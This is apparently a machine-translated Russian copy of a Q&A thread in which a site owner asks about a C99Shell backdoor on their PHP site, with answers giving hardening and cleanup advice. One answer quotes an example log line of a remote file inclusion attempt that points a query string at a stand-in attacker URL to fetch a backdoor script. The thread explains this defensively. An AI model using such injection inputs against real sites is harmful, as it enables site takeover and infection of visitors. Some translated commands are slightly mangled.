Вопросы Теги

Защита сайта от Backdoor / PHP.C99Shell или Trojan.Script.224490

Мой сайт был заражен троянским скриптом.

Кто-то сумел создать / загрузить файл с именем "x76x09.php" или "config.php" в корень моего веб-пространства каталог. Его размер составляет 44287 байт, а контрольная сумма MD5 - 8dd76fc074b717fccfa30b86956992f8. Я проанализировал этот файл с помощью Virustotal . Эти результаты говорят, что это «Backdoor / PHP.C99Shell» или «Trojan.Script.224490».

Этот файл был выполнен в тот же момент, когда он был создан. Так что это должно было произойти автоматически. Этот файл добавляет следующий вредоносный код в конец каждого index.php в моем веб-пространстве.

После того, как этот код появился на моей странице, пользователи сообщили о появлении синей панели в Firefox. Он попросил их установить плагин. Теперь у некоторых из них есть Exploit.Java.CVE-2010-0886.a на их ПК.

Заражение произошло, хотя у меня были включены allow_url_fopen и allow_url_include. И мой хостер говорит, что файл не был загружен через FTP.

Итак, мои вопросы:

  • Что делает вредоносный код? Как это закодировано?
  • Как может удаленный файл («x76x09.php» или «config.php» ) Заходите в мое интернет-пространство? SQL-инъекция? Вирус на моем ПК?
  • Как я могу защитить свой сайт от таких атак в будущем?

Заранее большое спасибо! Мне действительно нужна помощь.

Этот вопрос похож. Но это больше похоже на отчет. Я не знал, что это вирус с самого начала. Таким образом, этот вопрос относится к самому вирусу, а другой - нет.

8
задан Community 23 May 2017 в 12:25
поделиться

3 ответа

Ваш веб-сайт был взломан с использованием кода эксплойта .

  1. Вы должны все обновить, включая любые библиотеки php, которые вы можете установили.

  2. Запустите phpsecinfo и удалите все красный и как можно больше желтого изменив свой .htaccess или php.ini.

  3. Отменить права записи у всех файлы и папки вашего веб-корня ( chmod 500 -R / var / www && chown www-root / var / www ) chown должен быть любым пользователем, который запускает php, поэтому сделать для выяснить это.

  4. Измените все пароли и используйте sftp. или ftps, если можете.

  5. Удалите права доступа FILE из вашего Учетная запись MySQL, что ваш php приложение использует.

6
ответ дан 5 December 2019 в 12:54
поделиться

Вероятно, на вашем сайте есть механизм загрузки, который не фильтруется должным образом. Например, если у вас есть возможность использовать фотографию профиля, кто-то может загрузить php-файл, найти способ выполнить его и получить контроль над вашим сайтом.

x76x09.php - это браузер/загрузчик каталогов без цензуры, который позволяет злоумышленнику получить полный контроль над вашим сайтом.

Немедленно временно отключите все способы загрузки файлов на ваш сервер и удалите все экземпляры вредоносного кода во ВСЕХ файлах.

0
ответ дан 5 December 2019 в 12:54
поделиться

Многие из обнаруженных нами веб-сайтов, которые были взломаны, являются результатом вируса на ПК, который используется для передачи файлов FTP на зараженный веб-сайт. Вирус крадет пароль FTP разными способами, но в основном двумя.

Во-первых, если вы используете бесплатную программу FTP, такую ​​как FileZilla, вы должны знать, что эти программы хранят свои сохраненные учетные данные для входа в простой текстовый файл. Вирусу легко найти их, прочитать и отправить информацию на сервер, который затем входит в FTP с действующими учетными данными, копирует определенные файлы себе, заражает их, а затем отправляет обратно на веб-сайт. Часто он также копирует эти «бэкдорные» сценарии оболочки на веб-сайт, чтобы при изменении паролей FTP они все еще могли повторно заразить сайт.

Вирус также «перехватывает» FTP-трафик. Поскольку FTP передает все данные, включая имя пользователя и пароль, в виде простого текста, вирус также легко может увидеть и украсть информацию таким образом.

Однако довольно часто, когда мы видим бэкдор, вызывающий заражение, это обычно результат уязвимости удаленного включения файлов где-то на сайте. Хакеры постоянно пытаются добавить URL-адрес, указывающий на один из их бэкдоров, в конец любой строки запроса. Таким образом, в журналах доступа вы можете увидеть что-то вроде:

/path/folder/another/folder/file.php? http://www.hackerswebsite.com/id.txt ????

Здесь строка пути / папки предназначена только для демонстрационных целей.

Иногда эта команда работает, и они могут скопировать id.txt на предполагаемый веб-сайт и, таким образом, имеют сценарий оболочки бэкдора, с помощью которого они могут управлять файлами.

Измените все пароли - FTP, базу данных, cPanel или другой административный интерфейс.

Проверить все компьютеры на вирусы.

Перейти на SFTP.

Проверить все папки на 755 разрешений и все файлы на 644. Это то, что стандартно.

Если бы это была SQL-инъекция, заражение не было бы в конце файла. Где-то там есть вызов SQL для генерации контента.

Да. С сегодняшними бэкдорами злоумышленник может и, вероятно, уже просмотрел файлы config.php, в которых сохранены ваши данные MySQL.

Изменить все пароли.

7
ответ дан 5 December 2019 в 12:54
поделиться
Другие вопросы по тегам:

Похожие вопросы: